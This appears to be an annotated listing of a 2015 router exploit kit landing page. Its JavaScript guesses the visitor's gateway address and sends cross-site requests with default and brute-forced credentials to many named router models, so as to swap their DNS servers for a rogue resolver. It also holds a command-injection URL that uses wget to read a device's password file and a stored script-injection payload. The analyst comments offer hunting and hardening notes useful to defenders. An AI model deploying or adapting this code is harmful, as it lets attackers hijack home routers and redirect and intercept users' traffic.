Kafeine

REK - Router EK

May 18th, 2015
  1. <html><head><script type="text/javascript" src="e_x.js"></script></head>
  2. <body>
  3. <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
  4. <script language="javascript">
  /* Analyst note: settings shared by the routines below.
     pDNS is the resolver address the script tries to install as a router's
     primary DNS server; treat it as an indicator of compromise when it shows
     up in router or DHCP configuration. sDNS is installed as the secondary. */
  5. var pDNS = "37.139.50.45";
  6. var sDNS = "8.8.8.8";
  /* Passwords that srq() tries together with the user name "admin".
     "<eopl>" is the last entry; exp() checks GET URLs for that string. */
  7. var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","<eopl>"];
  /* Delays in milliseconds before exp() calls window.stop():
     gstp on the GET path, pstp on the POST path. */
  8. var gstp=400;
  9. var pstp=5000;
  /* Analyst note: request helper used by every routine in this listing.
     The visitor's own browser sends the request, so it reaches devices on the
     visitor's local network (cross-site request forgery against a device's
     web management interface).
       url    - target URL, often with credentials embedded as userinfo
       data   - "k=v&k=v" string turned into form fields (non-GET path only)
       method - "GET" selects the stylesheet path, anything else the form path
     Defensive relevance: a management interface that accepts state-changing
     requests without a per-session token, or that still uses default
     credentials, is exposed to this pattern. */
  10. function exp(url, data, method){
  11.     if(method=="GET"){
      /* The URL is requested as a CSS @import; a random "ju" parameter is appended. */
  12.     document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>');
      /* When the URL contains "<eopl>", window.stop() is scheduled after gstp ms. */
  13.     if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);}
  14.     }
  15.     else{
      /* Form path: a 1px by 1px iframe hosts a form built from the data string. */
  16.         document.write('<body></body>');
  17.         var ifrm = document.createElement('IFRAME');
  18.         ifrm.height="1px";
  19.         ifrm.width="1px";
  20.         document.body.appendChild(ifrm);
  21.        
  22.         var f=ifrm.contentWindow.document.createElement('FORM');
  23.         f.name='f';
  24.         f.method=method;
  25.         f.action=url;
  26.         var el=data.split('&');
  27.         for(i=0;i<el.length;i++)
  28.         {
  29.             var e=el[i].split('=');
  30.             var t=ifrm.contentWindow.document.createElement('INPUT');
  31.             t.type='TEXT';
  32.             t.id=e[0];
  33.             t.name=e[0];
  34.             t.value=e[1];
  35.             f.appendChild(t);
  36.         }
  37.         ifrm.contentWindow.document.body.appendChild(f);
  38.         f.submit();
      /* window.stop() is scheduled pstp ms after the form is submitted. */
  39.         var tm=setTimeout(function(){window.stop();},pstp);
  40.     }
  41. }
  /* Analyst note: password-guessing loop against one management endpoint.
     For each of twelve passlist entries it builds a GET URL for
     /userRpm/WanDynamicIpCfgRpm.htm (the query names the host TL-WR941ND) with
     "admin:<password>@" as URL userinfo and pDNS/sDNS as the DNS servers.
     Hunting: repeated requests to this path from a LAN client within a short
     interval, or a saved DNS server equal to pDNS. Replacing the default
     administrator password takes the device out of reach of this list. */
  42. function srq(ip) {
  43.     for(i=0;i<12;i++){
  44.    
  45.     var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save";
  46.     var method = "GET";
  47.     url = url1.replace("$1$","");
  48.     var cred="admin";
  49.     if(passlist[i]!="")
  50.         cred=cred+":"+passlist[i];
  51.     cred = cred+"@";   
      /* "$1$" in the template is replaced by the userinfo built above. */
  52.     url = url1.replace("$1$",cred);
  53.     exp(url, "", method);
  54.     }
  55.    
  56. }
  /* Analyst note: two requests sent through exp(): a GET to
     /cgi-bin/login.exe with the password "admin", then a POST to
     /cgi-bin/setup_dns.exe carrying the octets of pDNS and sDNS as separate
     fields and auto_from_isp=0. The function name suggests Belkin devices;
     the listing itself does not name a model. */
  57. function e_belkin(ip)
  58. {
  59.     var method = "POST";
  60.     var url = "";
  61.     var data ="";
  62.    
  63.     url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
  64.     exp(url, "", "GET");
  65.    
  66.     url="http://"+ip+"/cgi-bin/setup_dns.exe";
  67.     data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
  68.     exp(url, data, method);
  69. }
  70.  
  /* Analyst note: two POSTs to /cgi-bin/webcm sent through exp(). The first
     submits a login with user name and password "admin"; the second submits
     the resolver settings with pDNS and sDNS as name servers. Which products
     expose this endpoint is not stated in the listing. */
  71. function e_webcam(ip)
  72. {
  73.     var method = "POST";
  74.     var url = "";
  75.     var data ="";
  76.    
  77.     url="http://"+ip+"/cgi-bin/webcm";
  78.     data="getpage=../html/home.htm&errorpage=../html/index.html&login:command/username=admin&login:command/password=admin&var:errormsg=Error";
  79.     exp(url, data, method);
  80.    
  81.     url="http://"+ip+"/cgi-bin/webcm";
  82.     data="getpage=../html/setup/dns.htm&resolver:settings/nameserver1="+pDNS+"&resolver:settings/nameserver2="+sDNS+"&dproxy:settings/state=2";
  83.     exp(url, data, method);
  84. }
  85.  
  86.  
  /* Analyst note: POST-based stage. Calls e_belkin() and e_webcam(), then
     submits DNS settings through exp() to several management endpoints
     (/apply.cgi, /goform/AdvSetDns, /login.cgi, /h_wan_fix.cgi), some with
     admin:admin as URL userinfo. r_exp() schedules this routine one second
     after it starts.
     Hunting: POSTs from a LAN client to these paths whose body names pDNS. */
  87. function p_exp(ip) {
  88.     e_belkin(ip);
  89.     e_webcam(ip);
  90.    
  91.     var method = "POST";
  92.     var url = "";
  93.     var data ="";
  94.    
      /* Besides pDNS/sDNS, this body carries hard-coded octets 217.12.208.38 in
         lan_dns0_0..3, an address distinct from pDNS and worth including when
         reviewing device configuration. */
  95.     url = "http://admin:admin@"+ip+"/apply.cgi";
  96.     data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8";
  97.     exp(url, data, method);
  98.    
  99.     url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm";
  100.     data="submit_flag=ether&ether_dnsaddr1="+pDNS+"&ether_dnsaddr2="+sDNS+"&ether_dnsaddr3=8.8.8.8&Apply=Apply";
  101.     exp(url, data, method);
  102.    
  103.     url="http://"+ip+"/goform/AdvSetDns";
  104.     data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS;
  105.     exp(url, data, method); /*Unicorn WB-3300NR*/
  106.    
      /* Login attempt with user name "admin" and an empty password field. */
  107.     url="http://"+ip+"/login.cgi";
  108.     data="login_name=admin&login_pass=";
  109.     exp(url, data, method);
  110.    
  111.     url="http://"+ip+"/h_wan_fix.cgi";
  112.     data="static_dns1="+pDNS+"&static_dns2="+sDNS;
  113.     exp(url, data, method);
  114.    
  115. }
  116.  
  /* Analyst note: the commented-out block is an earlier variant that went
     through exp(). The live code appends two IMG elements so the browser
     requests two URLs: a /frames.asp login with admin/motorola, then a
     /goformFOO/AlFrame request whose serverId.entry value contains URL-encoded
     JavaScript that references pDNS. The second request appears to depend on
     the device writing that value into a page without escaping; confirm
     against the affected firmware before relying on this reading.
     Hunting: a virtual-server entry on the device holding script text, or a
     WAN DNS address equal to pDNS. */
  117. function e_moto(ip)
  118. {
  119.     /*var method = "GET";
  120.     var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola";
  121.     exp(url, "", method);  
  122.    
  123.     url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply';
  124.     exp(url, "", POST); */
  125.     var i1 = document.createElement('IMG');
  126.     document.body.appendChild(i1);
  127.     var i2 = document.createElement('IMG');
  128.     document.body.appendChild(i2);
  129.     i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';
  130.     i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27';
  131.    
  132. }/*Motorola*/
  133.  
  /* Analyst note: main routine, called with the guessed gateway address.
     It sends a series of GET requests through exp(). Almost every URL names
     pDNS and sDNS as the DNS servers to save, and many embed default
     credentials (admin:admin, admin:password, Admin:1234, user:user,
     root:root) as URL userinfo. It then schedules p_exp() after one second
     and calls srq() and e_moto(). Device names appear only where the original
     author left a trailing comment.
     Hunting: a LAN client requesting these management paths with a DNS
     parameter equal to pDNS, or a router whose DNS servers changed to an
     address the operator did not set.
     Hardening: replace default administrator passwords, apply vendor firmware
     updates, and restrict access to the management interface where the device
     allows it. */
  134. function r_exp(ip) {
  135.    
  136.     var method = "GET";
  137.     var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random();
  138.     //exp(url, "", method);
  139.    
      /* Unlike the settings requests below, this URL places shell syntax
         (backticks, wget) in the cmd parameter together with todo=syscmd, so it
         attempts command execution on the device and reads /www/.htpasswd
         rather than relying on a default password. */
  140.     url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1&curpath=/&currentsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/&currentsetting.htm=1";
  141.     exp(url, "", method); /*DGN 1000/DGN2200*/
  142.    
  143.     url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0";
  144.     exp(url, "", method); /*asus rt n66u*/
  145.    
  146.     url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U&current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1";
  147.     exp(url, "", method); /*asus rt n56u*/
  148.    
  149.     url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS;
  150.     exp(url, "", method); /*asus rt n56u*/
  151.    
  152.     url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS;
  153.     exp(url, "", method);/*asus nt-12*/
  154.    
  155.     url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+"";
  156.     exp(url, "", method);
  157.    
  158.     url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  159.     exp(url, "", method);
  160.    
  161.     url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  162.     exp(url, "", method); /*Philips*/
  163.    
  164.     url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"";
  165.     exp(url, "", method);/*Motorola SBG901*/
  166.      
  167.     url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP"
  168.     exp(url, "", method);
  169.    
  170.     url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS;
  171.     exp(url, "", method);
  172.    
  173.     url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500";
  174.     exp(url, "", method);
  175.    
  176.     url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  177.     exp(url, "", method);
  178.    
  179.     url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  180.     exp(url, "", method);
  181.    
  182.     url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"";
  183.     exp(url, "", method);
  184.    
  185.     url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  186.     exp(url, "", method);
  187.    
  188.     url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  189.     exp(url, "", method);
  190.    
  191.     url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1";
  192.     exp(url, "", method);
  193.    
      /* The next requests address DHCP-server settings, i.e. the DNS servers
         handed to LAN clients, not only the router's own WAN resolver. */
  194.     url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+";
  195.     exp(url, "", method);
  196.    
  197.     url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6";
  198.     exp(url, "", method);
  199.    
  200.     url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en";
  201.     exp(url, "", method);
  202.    
  203.     url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save";
  204.     exp(url, "", method);
  205.    
  206.     url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced";
  207.     exp(url, "", method);
  208.    
  209.     url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+"";
  210.     exp(url, "", method);
  211.    
  212.     url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+"";
  213.     exp(url, "", method);
  214.    
  215.     url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS;
  216.     exp(url, "", method);
  217.    
  218.     url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS
  219.     exp(url, "", method);
  220.    
  221.     url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc";
  222.     exp(url, "", method); /*DI 604*/
  223.    
  224.    
      /* Remaining stages: p_exp() after one second, then srq() and e_moto(). */
  225.     var t=setTimeout(function(){p_exp(ip);},1000);
  226.     srq(ip);
  227.     e_moto(ip);
  228. }
  /* Analyst note: entry point of the page.
     is_chrome holds the index of "chrome" in the lower-cased user agent (-1
     when absent); its only use in this listing is the commented-out line
     below, which would have redirected visitors with an empty referrer or a
     non-Chrome browser to about:blank. */
  229. var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome');
  230. //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")};
  231.  
  /* getIPs is not defined in this listing; presumably it comes from e_x.js,
     which the page head loads, and reports the visitor's local addresses to
     the callback (TODO confirm against that file).
     The callback keeps only private or link-local IPv4 addresses, rewrites the
     last octet to 1 to guess the gateway, and calls r_exp() only when the
     guess is one of the nine addresses in gw.
     Defensive relevance: the page needs the browser to disclose a local
     address first, so preventing that disclosure stops the chain before any
     request reaches the router. */
  232. getIPs(function(ip) {
  233.     if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
  234.         var gw = ["192.168.1.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"];
  235.         var sip = ip.split(".");
  236.         ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1";
  237.         var i = 0;
  238.         var j = 0;
  239.         for (i = 0; i < gw.length; i++) {
  240.             if (ip == gw[i]) {
  241.                 j = j + 1;
  242.                 break;
  243.             }
  244.         };
  245.         i = i + 1;
  246.         if (j > 0) {
  247.             r_exp(ip);
  248.         };
  249.     }
  250. });
  251.  
  252. </script>
  253. </body>
  254. </html>